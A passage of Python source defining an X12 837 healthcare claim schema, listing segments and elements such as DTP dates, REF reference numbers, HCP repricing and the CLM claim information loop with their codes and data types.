"DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Last Seen Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["304"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Test Date", position="4550", repeat="2", req_sit="S", syntax="" ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["738", "739"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Shipped Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["011"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Last X-ray Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["455"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", 
req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Initial Treatment Date", position="4550", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["454"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "QTY", Properties( desc="Ambulance Patient Count", position="4600", repeat="1", req_sit="S", syntax="E0204 R0204", ), Element( "QTY01", Properties( desc="Quantity Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["PT"], ), ), Element( "QTY02", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=2, codes=[], ), ), Composite( "C001", Properties( desc="Composite Unit of Measure", refdes="", repeat="", req_sit="N", seq="03", ), ), Element( "QTY04", Properties( desc="Free-form Information", req_sit="N", data_type=("AN", "1", "30"), position=4, codes=[], ), ), ), Segment( "QTY", Properties( desc="Obstetric Anesthesia Additional Units", position="4600", repeat="1", req_sit="S", syntax="E0204 R0204", ), Element( "QTY01", Properties( desc="Quantity Qualifier", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["FL"], ), ), Element( "QTY02", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=2, codes=[], ), ), Composite( "C001", Properties( desc="Composite Unit of Measure", refdes="", repeat="", req_sit="N", seq="03", ), ), Element( "QTY04", Properties( desc="Free-form Information", req_sit="N", data_type=("AN", "1", "30"), position=4, codes=[], ), ), ), Segment( 
"MEA", Properties( desc="Test Result", position="4620", repeat="5", req_sit="S", syntax="R03050608 L050412 L060412 L07030506 E0803 P1112", ), Element( "MEA01", Properties( desc="Measurement Reference ID Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["OG", "TR"], ), ), Element( "MEA02", Properties( desc="Measurement Qualifier", req_sit="R", data_type=("ID", "1", "3"), position=2, codes=["HT", "R1", "R2", "R3", "R4"], ), ), Element( "MEA03", Properties( desc="Measurement Value", req_sit="R", data_type=("R", "1", "20"), position=3, codes=[], ), ), Composite( "C001", Properties( desc="Composite Unit of Measure", refdes="", repeat="", req_sit="N", seq="04", ), ), Element( "MEA05", Properties( desc="Range Minimum", req_sit="N", data_type=("R", "1", "20"), position=5, codes=[], ), ), Element( "MEA06", Properties( desc="Range Maximum", req_sit="N", data_type=("R", "1", "20"), position=6, codes=[], ), ), Element( "MEA07", Properties( desc="Measurement Significance Code", req_sit="N", data_type=("ID", "2", "2"), position=7, codes=[], ), ), Element( "MEA08", Properties( desc="Measurement Attribute Code", req_sit="N", data_type=("ID", "2", "2"), position=8, codes=[], ), ), Element( "MEA09", Properties( desc="Surface/Layer/Position Code", req_sit="N", data_type=("ID", "2", "2"), position=9, codes=[], ), ), Element( "MEA10", Properties( desc="Measurement Method or Device", req_sit="N", data_type=("ID", "2", "4"), position=10, codes=[], ), ), Element( "MEA11", Properties( desc="Code List Qualifier Code", req_sit="N", data_type=("ID", "1", "3"), position=11, codes=[], ), ), Element( "MEA12", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=12, codes=[], ), ), ), Segment( "CN1", Properties( desc="Contract Information", position="4650", repeat="1", req_sit="S", syntax="", ), Element( "CN101", Properties( desc="Contract Type Code", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["01", "02", "03", "04", "05", "06", 
"09"], ), ), Element( "CN102", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "CN103", Properties( desc="Percent, Decimal Format", req_sit="S", data_type=("R", "1", "6"), position=3, codes=[], ), ), Element( "CN104", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=4, codes=[], ), ), Element( "CN105", Properties( desc="Terms Discount Percent", req_sit="S", data_type=("R", "1", "6"), position=5, codes=[], ), ), Element( "CN106", Properties( desc="Version Identifier", req_sit="S", data_type=("AN", "1", "30"), position=6, codes=[], ), ), ), Segment( "REF", Properties( desc="Repriced Line Item Reference Number", position="4700", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["9B"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Adjusted Repriced Line Item Reference Number", position="4700", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["9D"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Prior 
Authorization", position="4700", repeat="5", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["G1"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), Segment( "REF", Properties( desc="Line Item Control Number", position="4700", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["6R"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( 
desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Mammography Certification Number", position="4700", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["EW"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Clinical Laboratory Improvement Amendment (CLIA) Number", position="4700", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["X4"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Referring Clinical Laboratory Improvement Amendment (CLIA) Facility Identification", position="4700", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["F4"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( 
desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Immunization Batch Number", position="4700", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["BT"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Referral Number", position="4700", repeat="5", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["9F"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="S", seq="04" ), Element( "REF04-01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["2U"], ), ), Element( "REF04-02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "REF04-03", Properties( desc="Reference Identification Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "REF04-04", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=3, codes=[], ), ), Element( "REF04-05", Properties( desc="Reference Identification Qualifier", req_sit="N", 
data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "REF04-06", Properties( desc="Reference Identification", req_sit="N", data_type=("AN", "1", "50"), position=5, codes=[], ), ), ), ), Segment( "AMT", Properties( desc="Sales Tax Amount", position="4750", repeat="1", req_sit="S", syntax="" ), Element( "AMT01", Properties( desc="Amount Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["T"], ), ), Element( "AMT02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "AMT03", Properties( desc="Credit/Debit Flag Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), ), Segment( "AMT", Properties( desc="Postage Claimed Amount", position="4750", repeat="1", req_sit="S", syntax="", ), Element( "AMT01", Properties( desc="Amount Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=1, codes=["F4"], ), ), Element( "AMT02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "AMT03", Properties( desc="Credit/Debit Flag Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), ), Segment( "K3", Properties( desc="File Information", position="4800", repeat="10", req_sit="S", syntax="", ), Element( "K301", Properties( desc="Fixed Format Information", req_sit="R", data_type=("AN", "1", "80"), position=1, codes=[], ), ), Element( "K302", Properties( desc="Record Format Code", req_sit="N", data_type=("ID", "1", "2"), position=2, codes=[], ), ), Composite( "C001", Properties( desc="Composite Unit of Measure", refdes="", repeat="", req_sit="N", seq="03", ), ), ), Segment( "NTE", Properties( desc="Line Note", position="4850", repeat="1", req_sit="S", syntax="" ), Element( "NTE01", Properties( desc="Note Reference Code", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["ADD", "DCP"], ), ), Element( "NTE02", Properties( desc="Description", req_sit="R", 
data_type=("AN", "1", "80"), position=2, codes=[], ), ), ), Segment( "NTE", Properties( desc="Third Party Organization Notes", position="4850", repeat="1", req_sit="S", syntax="", ), Element( "NTE01", Properties( desc="Note Reference Code", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["TPO"], ), ), Element( "NTE02", Properties( desc="Description", req_sit="R", data_type=("AN", "1", "80"), position=2, codes=[], ), ), ), Segment( "PS1", Properties( desc="Purchased Service Information", position="4880", repeat="1", req_sit="S", syntax="", ), Element( "PS101", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=1, codes=[], ), ), Element( "PS102", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "PS103", Properties( desc="State or Province Code", req_sit="N", data_type=("ID", "2", "2"), position=3, codes=[], ), ), ), Segment( "HCP", Properties( desc="Line Pricing/Repricing Information", position="4920", repeat="1", req_sit="S", syntax="R0113 P0910 P1112", ), Element( "HCP01", Properties( desc="Pricing Methodology", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=[ "00", "01", "02", "03", "04", "05", "06", "07", "08", "09", "10", "11", "12", "13", "14", ], ), ), Element( "HCP02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "HCP03", Properties( desc="Monetary Amount", req_sit="S", data_type=("R", "1", "18"), position=3, codes=[], ), ), Element( "HCP04", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=4, codes=[], ), ), Element( "HCP05", Properties( desc="Rate", req_sit="S", data_type=("R", "1", "9"), position=5, codes=[], ), ), Element( "HCP06", Properties( desc="Reference Identification", req_sit="S", data_type=("AN", "1", "50"), position=6, codes=[], ), ), Element( "HCP07", Properties( desc="Monetary Amount", 
req_sit="S", data_type=("R", "1", "18"), position=7, codes=[], ), ), Element( "HCP08", Properties( desc="Product/Service ID", req_sit="N", data_type=("AN", "1", "48"), position=8, codes=[], ), ), Element( "HCP09", Properties( desc="Product/Service ID Qualifier", req_sit="S", data_type=("ID", "2", "2"), position=9, codes=["ER", "HC", "IV", "WK"], ), ), Element( "HCP10", Properties( desc="Product/Service ID", req_sit="S", data_type=("AN", "1", "48"), position=10, codes=[], ), ), Element( "HCP11", Properties( desc="Unit or Basis for Measurement Code", req_sit="S", data_type=("ID", "2", "2"), position=11, codes=["MJ", "UN"], ), ), Element( "HCP12", Properties( desc="Quantity", req_sit="S", data_type=("R", "1", "15"), position=12, codes=[], ), ), Element( "HCP13", Properties( desc="Reject Reason Code", req_sit="S", data_type=("ID", "2", "2"), position=13, codes=["T1", "T2", "T3", "T4", "T5", "T6"], ), ), Element( "HCP14", Properties( desc="Policy Compliance Code", req_sit="S", data_type=("ID", "1", "2"), position=14, codes=["1", "2", "3", "4", "5"], ), ), Element( "HCP15", Properties( desc="Exception Code", req_sit="S", data_type=("ID", "1", "2"), position=15, codes=["1", "2", "3", "4", "5", "6"], ), ), ), parsed_837_2410, parsed_837_2420A, parsed_837_2420B, parsed_837_2420C, parsed_837_2420D, parsed_837_2420E, parsed_837_2420F, parsed_837_2420G, parsed_837_2420H, parsed_837_2430, parsed_837_2440, ) parsed_837_2300 = Loop( "2300", Properties( desc="Claim Information", looptype="", position="1300", repeat="100", req_sit="S", ), Segment( "CLM", Properties( desc="Claim Information", position="1300", repeat="1", req_sit="R", syntax="", ), Element( "CLM01", Properties( desc="Claim Submitter's Identifier", req_sit="R", data_type=("AN", "1", "38"), position=1, codes=[], ), ), Element( "CLM02", Properties( desc="Monetary Amount", req_sit="R", data_type=("R", "1", "18"), position=2, codes=[], ), ), Element( "CLM03", Properties( desc="Claim Filing Indicator Code", req_sit="N", 
data_type=("ID", "1", "2"), position=3, codes=[], ), ), Element( "CLM04", Properties( desc="Non-Institutional Claim Type Code", req_sit="N", data_type=("ID", "1", "2"), position=4, codes=[], ), ), Composite( "C023", Properties( desc="Health Care Service Location Information", refdes="", repeat="", req_sit="R", seq="05", ), Element( "CLM05-01", Properties( desc="Facility Code Value", req_sit="R", data_type=("AN", "1", "2"), position=0, codes=[], ), ), Element( "CLM05-02", Properties( desc="Facility Code Qualifier", req_sit="R", data_type=("ID", "1", "2"), position=1, codes=["B"], ), ), Element( "CLM05-03", Properties( desc="Claim Frequency Type Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=[], ), ), ), Element( "CLM06", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=6, codes=["N", "Y"], ), ), Element( "CLM07", Properties( desc="Provider Accept Assignment Code", req_sit="R", data_type=("ID", "1", "1"), position=7, codes=["A", "B", "C"], ), ), Element( "CLM08", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=8, codes=["N", "W", "Y"], ), ), Element( "CLM09", Properties( desc="Release of Information Code", req_sit="R", data_type=("ID", "1", "1"), position=9, codes=["I", "Y"], ), ), Element( "CLM10", Properties( desc="Patient Signature Source Code", req_sit="S", data_type=("ID", "1", "1"), position=10, codes=["P"], ), ), Composite( "C024", Properties( desc="Related Causes Information", refdes="", repeat="", req_sit="S", seq="11", ), Element( "CLM11-01", Properties( desc="Related-Causes Code", req_sit="R", data_type=("ID", "2", "3"), position=0, codes=["AA", "EM", "OA"], ), ), Element( "CLM11-02", Properties( desc="Related-Causes Code", req_sit="S", data_type=("ID", "2", "3"), position=1, codes=["AA", "EM", "OA"], ), ), Element( "CLM11-03", Properties( desc="Related-Causes Code", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], 
), ), Element( "CLM11-04", Properties( desc="State or Province Code", req_sit="S", data_type=("ID", "2", "2"), position=3, codes=[], ), ), Element( "CLM11-05", Properties( desc="Country Code", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=[], ), ), ), Element( "CLM12", Properties( desc="Special Program Code", req_sit="S", data_type=("ID", "2", "3"), position=12, codes=["02", "03", "05", "09"], ), ), Element( "CLM13", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=13, codes=[], ), ), Element( "CLM14", Properties( desc="Level of Service Code", req_sit="N", data_type=("ID", "1", "3"), position=14, codes=[], ), ), Element( "CLM15", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=15, codes=[], ), ), Element( "CLM16", Properties( desc="Provider Agreement Code", req_sit="N", data_type=("ID", "1", "1"), position=16, codes=[], ), ), Element( "CLM17", Properties( desc="Claim Status Code", req_sit="N", data_type=("ID", "1", "2"), position=17, codes=[], ), ), Element( "CLM18", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=18, codes=[], ), ), Element( "CLM19", Properties( desc="Claim Submission Reason Code", req_sit="N", data_type=("ID", "2", "2"), position=19, codes=[], ), ), Element( "CLM20", Properties( desc="Delay Reason Code", req_sit="S", data_type=("ID", "1", "2"), position=20, codes=["1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11", "15"], ), ), ), Segment( "DTP", Properties( desc="Date - Onset of Current Illness or Symptom", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["431"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( 
desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Initial Treatment Date", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["454"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Last Seen Date", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["304"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Acute Manifestation", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["453"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Accident", position="1350", repeat="1", req_sit="S", syntax="" ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["439"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", 
data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Last Menstrual Period", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["484"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Last X-ray Date", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["455"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Hearing and Vision Prescription Date", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["471"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Disability Dates", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), 
position=1, codes=["314", "360", "361"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8", "RD8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Last Worked", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["297"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Authorized Return to Work", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["296"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Admission", position="1350", repeat="1", req_sit="S", syntax="" ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["435"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Discharge", position="1350", repeat="1", req_sit="S", syntax="" ), 
Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["096"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Assumed and Relinquished Care Dates", position="1350", repeat="2", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["090", "091"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Property and Casualty Date of First Contact", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["444"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), position=3, codes=[], ), ), ), Segment( "DTP", Properties( desc="Date - Repricer Received Date", position="1350", repeat="1", req_sit="S", syntax="", ), Element( "DTP01", Properties( desc="Date/Time Qualifier", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["050"], ), ), Element( "DTP02", Properties( desc="Date Time Period Format Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=2, codes=["D8"], ), ), Element( "DTP03", Properties( desc="Date Time Period", req_sit="R", data_type=("AN", "1", "35"), 
